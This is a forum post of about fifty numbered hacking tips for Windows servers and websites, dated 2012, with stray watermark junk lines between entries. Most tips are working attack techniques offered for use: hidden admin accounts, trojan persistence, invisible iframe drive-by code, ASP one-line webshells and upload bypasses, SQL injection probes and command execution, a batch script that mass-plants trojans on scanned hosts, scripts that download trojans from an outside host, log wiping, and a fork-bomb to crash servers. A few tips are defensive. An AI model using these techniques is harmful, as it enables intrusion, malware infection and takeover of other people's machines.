中国网络渗透测试联盟
标题:
一些笔记
[打印本页]
作者:
admin
时间:
2012-9-15 14:51
标题:
一些笔记
1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
' I3 p e7 k& F9 ^
cacls C:\windows\system32 /G hqw20:R
2 f9 l3 D/ G# Z1 S9 d1 \5 T
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
6 ?0 ~ x" H- U( I# C
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
) y; u$ A- M: V. x( y
) x5 ]% g5 P( i6 l7 I
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
1 O. B/ q. {6 }; c6 ~6 c
" ?1 E- r- u: F- y" i
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
2 H4 R0 b/ {; S. _1 J
' Y% t- P: J: W8 _4 p- l3 P
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
& ` b! V# D" b' r; O, i( ]" x
" z) A# ?+ _' v
5、利用INF文件来修改注册表
5 o: t9 ^8 W/ h% e4 n/ r6 ~4 R9 |
[Version]
4 b6 d5 \: C% J5 \- J% k4 v
Signature="$CHICAGO$"
9 S R. Y% D+ S6 v+ K
[Defaultinstall]
$ I' g( u. J/ G, [% ~
addREG=Ating
. B8 A% B6 H- J" ~6 V$ _& k" F
[Ating]
/ J" O2 h5 R0 G( H7 @) n
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
' c2 W+ H+ z s$ b' U8 B: ^8 c ~
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
2 X' _1 s8 }0 |9 s1 H5 b! y& _9 ~
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
& E. w9 j0 ^) t" k! a/ G
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
6 \/ t# Q) w6 m% l+ {/ N0 Q& o5 s5 H/ G
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
* u! l! W( J7 f" U
HKEY_CURRENT_CONFIG 简写为 HKCC
0 d4 s6 @+ y, ~/ l. o
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
1 J# Z0 K, W0 F3 W
"1"这里代表是写入或删除注册表键值中的具体数据
! W, T' \ u1 X6 Q+ }
: ^; G9 y, ^/ ~6 _# g
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
E d, P5 D3 ]# R
多了一步就是在防火墙里添加个端口,然后导出其键值
( Q/ S3 A- w2 m) i6 l$ ]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
: W# a9 ?) {' }2 I2 w
: l% i$ L% p2 J/ Q/ T9 W% E) d
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
; U7 t) O5 d) p9 q# j3 {1 v
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
+ o' y2 ?/ Z4 F+ b' A; {/ b' e/ R
( c& d4 ^/ H) M& \& j$ f& f
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
, I8 N1 w8 q( H3 M$ ^' K9 V
- U0 d: c, m0 b+ f& J, F b9 Z v
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
0 | u# F/ G3 T6 o. l/ F# D0 N
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
9 h5 i2 a0 o6 I# E
6 {- Q0 H6 P$ e6 |0 V" S5 ^1 e
10、用google帮我们找网站后台,搜索”filetype:asp site:
www.hack6.com
inurl:login”
6 {6 {3 e3 o+ I( H: ^. y3 X
' T8 V" q1 o2 c) v5 e6 s9 A
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
" x% Z" j9 y$ \" s
用法:xsniff –pass –hide –log pass.txt
1 Q2 g0 n5 V. {+ g# |( j& T! s" p
( F; g$ _- [3 G- M! _
12、google搜索的艺术
, h# G0 s- O" B7 R( y
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
! s( s. v4 }9 }1 f0 j
或“字符串的语法错误”可以找到很多sql注入漏洞。
M1 J2 L6 R2 I$ T- A2 s7 J" }2 F
! r. b$ ~5 w( W* t
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
2 F1 n: q7 E6 h% A# @! | V
( ?! n6 }2 [3 G
14、cmd中输入 nc –vv –l –p 1987
5 w, J$ L; B4 M% Z6 m9 ?; F8 B
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
7 K9 m& [! x j) C% o
3 d* E/ { s" L
15、制作T++木马,先写个ating.hta文件,内容为
Q: [: D- m2 T8 D5 F
<script language="VBScript">
5 q9 `. e- s8 k; N5 q" f$ s) G
set wshshell=createobject ("wscript.shell" )
1 F5 T9 G& ]# M
a=wshshell.run("你马的名称",1)
9 u: P2 |( ]( s- |3 k* G( o0 @
window.close
5 [! ^) G- ^! x0 @" n+ d+ P F
</script>
5 {" {5 U" @7 q/ P1 Q% o- G( I' A
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
$ D( W) G! l* E& H* o5 j0 ~
1 D7 M, Z4 S' R# S1 t( ^: w/ f
16、搜索栏里输入
# Y+ Y" E: r4 t8 p! Q+ \
关键字%'and 1=1 and '%'='
: b9 w0 v, J5 T
关键字%'and 1=2 and '%'='
T. s# E* ?4 G# R+ W
比较不同处 可以作为注入的特征字符
& b- \4 Y% u( J1 `+ k; J
9 B* _ e% | P7 e) @3 h# o
17、挂马代码<html>
& T5 z5 a5 w/ Z. G* b. c
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
% g, {. B& v C
</html>
2 { J p& W* a0 c
5 l6 X/ V- z7 x$ ?
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
A. ^' A. l% _6 H
net localgroup administrators还是可以看出Guest是管理员来。
. u& y6 r) G* t/ q9 z; l a. y
* j3 I% i n [5 C$ {
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
' M6 G3 X/ v% `4 ?- ]# ?. [
用法: 安装: instsrv.exe 服务名称 路径
# v) H; k# M3 R M8 P$ ?- d) I
卸载: instsrv.exe 服务名称 REMOVE
! I" y5 f- q3 g1 [) y
8 w4 O! d& I0 q6 @1 J$ q, K
9 O& P9 E' I" s% a% T' z* d' d& M1 c
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
5 I2 }5 l. O* A) }
不能注入时要第一时间想到%5c暴库。
0 n& E! x/ Z5 A2 l
: K; {, r7 N8 k% U* l7 M. c
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
1 T$ ?; V7 i8 a8 f8 q3 c
9 {1 ?5 f- ? o' c# ]
23、缺少xp_cmdshell时
}# m7 I& W# c: o$ k3 j& k0 v
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
! R/ j# m( r* ]2 a2 \6 Y& V
假如恢复不成功,可以尝试直接加用户(针对开3389的)
& _! [1 e3 q- l0 o! a+ @1 q! s
declare @o int
* ?7 z5 r3 _! [( o4 |! l- s% ^1 F
exec sp_oacreate 'wscript.shell',@o out
' K$ D4 @8 _5 ^* V
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
4 \- @5 |9 N+ k# F* I
, j+ U6 ~6 y) f2 N9 n% Y
24.批量种植木马.bat
; ?- I" h( x3 @
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
/ o( |( R& ?# }0 P
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
+ |4 I0 S- K) w P3 V
扫描地址.txt里每个主机名一行 用\\开头
' w) j! a) E5 ]
, l, E: U/ H4 D- H) C! [
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
2 G/ j: R+ b8 m
- `9 S. q* t+ M" J: L
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
& T$ @7 J3 U5 O- a( D3 N C! o
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
/ Q: g% o" q1 w# x0 U
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
" O. L3 v1 N' R+ ~, ?- Y
- T, z$ a& ?* l# s
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
! v+ S- f5 U4 f$ R
然后用#clear logg和#clear line vty *删除日志
* b! W) s) l4 u. F& ~
! q* `) `, M7 o; T" P
28、电脑坏了省去重新安装系统的方法
% o& N- T1 B- V3 s, u, J
纯dos下执行,
8 c( L" ~+ V8 v
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
0 ?$ u! T$ t7 Z+ U+ j8 c! J
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
5 e0 c' |# U2 [ J" B2 }, Q: V4 ]
0 I ~7 e, q6 E1 U1 Z/ n
29、解决TCP/IP筛选 在注册表里有三处,分别是:
8 m2 ?1 g* y! r% y4 o
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
, k: e8 s1 C2 H1 v
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
, Z* |- J; l+ j; G0 C& n+ K
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
; |, [ V- V9 X% g: m6 k
分别用
9 B$ p+ _% K( z+ N1 N" K- R
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
5 O' u, Y- X; I; v
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
, G. K5 `, w: U% L2 V1 ?1 M8 `
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
* w, `8 e4 l9 I% Y) k- v7 k+ p
命令来导出注册表项
; D+ f, V/ n6 h u2 J/ ]/ T1 S9 z/ `
然后把三个文件里的EnableSecurityFilters"=dword:00000001,
( ?. Q- d7 l4 S
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
: {$ @3 F3 b& S
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
3 y7 P% A9 s; P) ^/ Q0 A8 W
6 K6 u% Q0 s$ d$ \
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
. S0 R, ^) X1 j) a+ }3 X3 @$ c
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
4 u: G* k, m* Z1 N k
7 ]/ k3 P% m% s- x
31、全手工打造开3389工具
3 @" p) _1 U7 R* C8 Z/ B1 `6 n
打开记事本,编辑内容如下:
1 @: d8 c, Q7 k5 I
echo [Components] > c:\sql
( f: z- H) A$ `7 M0 T
echo TSEnable = on >> c:\sql
F8 B5 F2 M! F* ]: W. r8 w! c$ B
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
) X) B: l% E5 P/ [& L
编辑好后存为BAT文件,上传至肉鸡,执行
8 B- J8 U$ ~& X* M0 Q
. ?" h9 M7 ^/ y0 D& C8 A
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
6 O) ~+ k3 z. [0 Z8 B$ y
. i2 y' h- O& O) B- g. X) i% h& `
33、让服务器重启
- d. u' \- Y+ z5 ~) R7 N1 \/ x
写个bat死循环:
7 q0 z; U2 P( F. T/ e4 Y1 K8 n7 m$ j
@echo off
% u* ]; D# r0 K. Z4 w; q6 W
:loop1
0 j7 X( I' Y3 J+ `( |, R( r" ?! u
cls
6 i5 ~5 H3 ]9 @
start cmd.exe
- N; Q5 D6 `, C- j9 w
goto loop1
" r% u/ G$ w; h0 N" J8 g/ M0 _
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
8 h7 ~- c/ ]$ u" a
5 R+ i) c' M; B% j
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
9 Y/ { J2 Z$ O( g9 q0 {
@echo off
( W( ^ t; B% L) V% s
date /t >c:/3389.txt
& H: |- E9 ]4 Q1 A+ _7 B' O/ |
time /t >>c:/3389.txt
$ R3 [ }1 G% r! x
attrib +s +h c:/3389.bat
) r/ I6 }2 A, W+ {; j, O% H
attrib +s +h c:/3389.txt
' t3 {3 u Y& H- l) @; v* M* U
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
; H- F. W8 i( a% H: c
并保存为3389.bat
) p J1 h4 [& L% h! O* X
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
* B+ D0 |! y& }4 }6 W6 V8 c! Y
' j! `6 p8 J: j" ?# k) {% R5 e
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
- D/ _ o) ^7 ?
start
http://www.hack520.org/muma.htm
然后点执行。(muma.htm是你上传好的漏洞网页)
6 l2 N! Z/ K+ I/ `! v
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
* N+ K/ y0 u, @3 s& F4 h( M6 {3 j- J
; @( u* u- c3 I7 ]" N, y
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
; c; E. m, d7 Y6 O
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
( N" S) f& H- X L' ~
echo 你的FTP账号 >>c:\1.bat //输入账号
! j, s) H' [9 b: p8 t' ]: [
echo 你的FTP密码 >>c:\1.bat //输入密码
! a' ~& ]9 ?% w8 K7 x# a" Z
echo bin >>c:\1.bat //登入
- ?3 q' F- P# y9 i; i5 |& P0 y
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
* b% m2 w8 p" j. x: @1 W8 m
echo bye >>c:\1.bat //退出
& h$ y$ p) h4 l# H0 W! d
然后执行ftp -s:c:\1.bat即可
J2 C! _8 u0 _6 R
) Q9 m4 q% U: Q! H! a
37、修改注册表开3389两法
: \; }0 U' F& `! U0 _$ u
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
" @3 f" ` Z! k, D( |
echo Windows Registry Editor Version 5.00 >>3389.reg
: g. ?$ L( {' ^
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
) |0 j1 u4 A1 r. a
echo "Enabled"="0" >>3389.reg
G: |' J$ |0 c; Q# X
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
3 [+ g# i" v4 K9 U1 q# c% ]4 _
NT\CurrentVersion\Winlogon] >>3389.reg
, E* w" b6 k/ n, X
echo "ShutdownWithoutLogon"="0" >>3389.reg
0 M Q+ e& }7 w
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
$ Z! b+ T$ l8 i M! `( l6 h6 J
>>3389.reg
5 m& M/ f# P3 f; ^/ s% q1 v
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
5 G7 j n/ l2 v1 D
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
9 A) D) R4 z- d9 R
>>3389.reg
, @/ K" a' d0 @; z8 z, {" [
echo "TSEnabled"=dword:00000001 >>3389.reg
4 E n! i$ R7 Q0 T$ n* G
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
$ s* l) C' ^4 y( \/ e7 ]
echo "Start"=dword:00000002 >>3389.reg
' c8 S4 i. {5 s$ j) `/ ?# e
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
$ _" b& ?1 T: W% n+ G
>>3389.reg
- K- N' @8 ]# Y
echo "Start"=dword:00000002 >>3389.reg
4 x) Q' J" P: s& A, G
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
# h' \" N3 u5 ? @
echo "Hotkey"="1" >>3389.reg
% f8 a1 D5 d$ \' j4 i7 [
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
! Z- e5 x! ^6 y) r$ w" D1 h
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
! p- R0 s ?) G1 I
echo "PortNumber"=dword:00000D3D >>3389.reg
+ {7 P) ]8 B1 \5 l+ g
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
1 m! n' F% v' v1 {
Server\WinStations\RDP-Tcp] >>3389.reg
3 d+ S |. \; G7 i9 t* S1 r `9 [
echo "PortNumber"=dword:00000D3D >>3389.reg
" A* K, D B+ d+ N
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
) b! Z0 h/ \$ B9 Y z6 s
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
) Y2 b$ p; f6 |' |& s
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
w* `, S# v" S% I5 T: v% K
(2)winxp和win2003终端开启
6 J1 r, I" @! ^" G) A
用以下ECHO代码写一个REG文件:
0 w! `# u0 F; j! |, `
echo Windows Registry Editor Version 5.00>>3389.reg
5 L2 O- f% `, c, _* N9 d
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
. e$ X. @$ E: V5 U! ~% [
Server]>>3389.reg
( y' A# |! b# i% n& M% u! ~* P. M
echo "fDenyTSConnections"=dword:00000000>>3389.reg
0 u* n2 q1 A) [- }8 q6 d
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
! [ R& f+ Z9 x) T
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
, v4 M+ {' u+ a9 C# T2 J% _7 u
echo "PortNumber"=dword:00000d3d>>3389.reg
. O" q& |: s4 o6 l w5 ]$ c
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
" p5 ]) a8 e) X5 k; }8 i n
Server\WinStations\RDP-Tcp]>>3389.reg
9 H; R4 l+ R" y0 t9 B
echo "PortNumber"=dword:00000d3d>>3389.reg
1 k2 Q) P9 H1 d/ _5 T4 I
然后regedit /s 3389.reg del 3389.reg
: t' m7 V1 R5 D6 J
XP下不论开终端还是改终端端口都不需重启
" X. k, F( L) |" l% k
" _6 M4 n* d+ @% u" H% L6 B! r
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
* g/ m1 p u# H9 @
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
$ D7 {4 I4 P* o! Q' `& l
5 _& _. L& j2 x, G0 D- r0 v
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
1 G& r4 Z2 ]" P
(1)数据库文件名应复杂并要有特殊字符
9 Y! }9 o! |1 O' n3 k! E8 o6 K' c M( U
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
$ R2 R, o2 [; b- S) o# H
将conn.asp文档中的
- p" C% J- X, D+ f: L6 W0 W
DBPath = Server.MapPath("数据库.mdb")
5 S7 J! K7 i# M$ R3 S
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
% w. i4 ?% w# K# e
+ o' P2 D2 I2 o
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
- f; ]+ A( \6 C* G+ u" ?1 y% H* ~
(3)不放在WEB目录里
; y/ T7 y+ I! P2 E8 y& z
) V) |$ K$ T6 b! L
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
s' z7 _- D) O5 |- ?& P2 ^
可以写两个bat文件
0 }3 h0 P& Z8 [& @ ~# \1 r
@echo off
' i! `# v- T& ?# V3 g6 d, w. g
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
6 q6 h" d) k& z3 U2 e2 b
@del c:\winnt\system32\query.exe
- g4 |! Z" A/ g) D% S6 |. I- S* h( |
@del %SYSTEMROOT%\system32\dllcache\query.exe
0 K# e9 d! S8 T: M# D4 _
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
% u' X- D, V9 f1 O
# z6 \) q: D1 r: U
@echo off
! H. @0 }: ?7 w+ `4 {7 e
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
$ S9 T1 S' @$ s- }6 d8 W
@del c:\winnt\system32\tsadmin.exe
/ I4 P5 w( t: |3 A
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
' y5 l3 A( S( v
* {: P/ j7 ~: k: ~# j k6 z: C
41、映射对方盘符
+ U: ?3 B* V7 k$ b j/ i
telnet到他的机器上,
+ H( I+ e; t) U, x6 ]5 c
net share 查看有没有默认共享 如果没有,那么就接着运行
7 g9 c( D) y# T: R1 p t7 Q" ^
net share c$=c:
: t( u+ Y* P# D* m! a a: m% c
net share现在有c$
! O3 h3 c: ?( B* E
在自己的机器上运行
; A2 z' y& `! v- P) C/ [$ O% X2 s
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
1 ^# r& n& ?# E% {0 P4 u
' U* o9 q, R. a- @. C0 d
42、一些很有用的老知识
4 [& q; \& P; N: X7 g
type c:\boot.ini ( 查看系统版本 )
1 J& l# w4 k! p& E8 j, `
net start (查看已经启动的服务)
$ [* N$ d4 q9 y2 R5 m+ C6 Z, N( b1 |% K
query user ( 查看当前终端连接 )
+ V3 p3 l+ T- @
net user ( 查看当前用户 )
: v# M2 C9 w4 T+ l3 O" R8 A0 _
net user 用户 密码/add ( 建立账号 )
2 H( h1 Y- L' M* v6 F* a& S
net localgroup administrators 用户 /add (提升某用户为管理员)
) K6 I/ s8 V/ X. W9 i6 b
ipconfig -all ( 查看IP什么的 )
7 r! L& C! z( R2 e/ ~
netstat -an ( 查看当前网络状态 )
9 z+ h/ i( y& j
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
6 B+ f1 U1 B+ r! ~
克隆时Administrator对应1F4
, E9 g; Q/ i9 z
guest对应1F5
9 b- X( n* ~! ^: \$ h
tsinternetuser对应3E8
$ o c0 c7 g* b9 d) Y2 ^; Y7 _ ?
5 {2 X: a# U# D* {. G
43、如果对方没开3389,但是装了Remote Administrator Service
! x( W3 @4 H! r/ q6 {) a) j
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
6 D( y# q) @/ ]5 P7 X6 D
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
1 D K0 U1 N9 [% x* N1 |
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
% u- L# k! N6 w
- ^# \) {3 p L) c; F# Z. V
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
7 D) {% Z: x: d1 }# I& u/ m
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
( v4 A# @. y( J
2 [ @/ A2 z. N6 o2 v$ r9 w8 p
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
& D3 J' M' v! }1 z' ~' F
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
2 H! ~/ u6 [ i8 G R. L& n
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
& D2 w+ N8 S3 f0 e: Y2 ~3 @9 D
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
* d: P) m1 C* s2 S
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
+ ~ {! x- R5 X) C, {- S- L
(这是完整的一句话,其中没有换行符)
1 G8 M+ N7 c' f# A$ _$ A& A2 s* G
然后下载:
& ?. N8 X4 f e1 F
cscript down.vbs
http://www.hack520.org/hack.exe
hack.exe
' y; n: I8 \/ R9 B4 ~2 m4 U
0 ~6 c( N! [ G# X: T
46、一句话木马成功依赖于两个条件:
; q+ A) U- b) ]# C: |7 _
1、服务端没有禁止adodb.Stream或FSO组件
O& q1 {! R: y( h
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
$ z1 w5 G8 v8 y
- ^2 X0 b6 F( e8 F- q0 b
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
i( d4 [( x' `8 {
;alter database utsz set RECOVERY FULL--
% T: Q, g4 A) ^+ l% A2 j3 {; ?
;create table cmd (a image)--
5 W! Y' d7 ?1 o, O
;backup log utsz to disk = 'D:\cmd' with init--
$ o$ t6 z8 X% w* S, R8 I) u
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
- ^1 Y5 b1 ]& b# H
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
; ?1 b2 P! x1 g; ~4 b
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
+ u5 G; T e% v% w
" H2 S% G. {9 u5 ?% |- V* f9 C
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
/ Z) l( z X8 B( h; o M: o" G
4 h" E. m: Z; ^2 P5 ` M) _
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
! E7 B7 h8 e: V* H9 r
所有会话用 'all'。
# N z. O) X @# G4 Z
-s sessionid 列出会话的信息。
0 A+ B- f H; l, T! a3 D* k2 O
-k sessionid 终止会话。
% D+ c- z& a/ @) N8 f
-m sessionid 发送消息到会话。
5 [# O7 p1 ]5 X, g/ A5 ~8 |
( i& [9 ?! [% |. O4 ]4 J3 F y
config 配置 telnet 服务器参数。
C. ?3 t3 @$ {- d0 B
( R' o$ r0 D- o1 G
common_options 为:
0 F) T4 k* | y( ]8 K7 k7 w
-u user 指定要使用其凭据的用户
! |& F3 W) B% o+ K
-p password 用户密码
8 z2 L( S% U( ]+ v& s
# e8 @! M: n7 V* a5 _- I2 l
config_options 为:
. `! S( |- A2 M9 h$ E1 f# l0 I K
dom = domain 设定用户的默认域
: M$ U g6 V4 }- N8 e
ctrlakeymap = yes|no 设定 ALT 键的映射
* P# q* \- d: w g1 C
timeout = hh:mm:ss 设定空闲会话超时值
0 _+ n( T8 |; g
timeoutactive = yes|no 启用空闲会话。
4 v0 ], a' h0 o+ T
maxfail = attempts 设定断开前失败的登录企图数。
" D& x0 B8 e' V1 T6 I' K
maxconn = connections 设定最大连接数。
2 F; E/ X. ^9 d1 E! B1 ]# H
port = number 设定 telnet 端口。
! g1 G# s! p2 R
sec = [+/-]NTLM [+/-]passwd
* l1 J# A7 N( X; m8 [! K+ G
设定身份验证机构
/ k; L$ x4 @3 c0 N) y& Q( D u0 b
fname = file 指定审计文件名。
- ^& x8 Q) b4 U# [
fsize = size 指定审计文件的最大尺寸(MB)。
$ p0 l& Q, k3 G7 x. j) L
mode = console|stream 指定操作模式。
0 D( T9 d9 H' W5 y4 O
auditlocation = eventlog|file|both
5 k2 Q |% _2 R! W
指定记录地点
- `0 b, i8 R; I2 d$ u: }1 V$ r
audit = [+/-]user [+/-]fail [+/-]admin
8 i+ X' a+ g8 ]: k
: E; c) E) G' X7 H4 a9 j
49、例如:在IE上访问:
) u+ K6 s1 ?4 N4 w0 u
www.hack520.org/hack.txt
就会跳转到
http://www.hack520.org/
% w% C T/ x; Y) Y
hack.txt里面的代码是:
4 m! y' z! q) m2 W6 }- I
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
; @$ P- [- w) E6 H: L$ z+ O8 n
把这个hack.txt发到你空间就可以了!
- y4 e3 h- [ z' k
这个可以利用来做网马哦!
# Y2 e8 }/ Y8 ?, e4 L* E! r
+ O0 m5 u I4 \0 {2 O- b3 L
50、autorun的病毒可以通过手动限制!
6 @5 O v) F" m% A0 C4 t
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
4 R6 K; F$ W% [0 h% @
2,打开盘符用右键打开!切忌双击盘符~
% ~, I* U# L" u/ c3 |1 E0 p! c
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
5 }; a- q6 K( P6 V
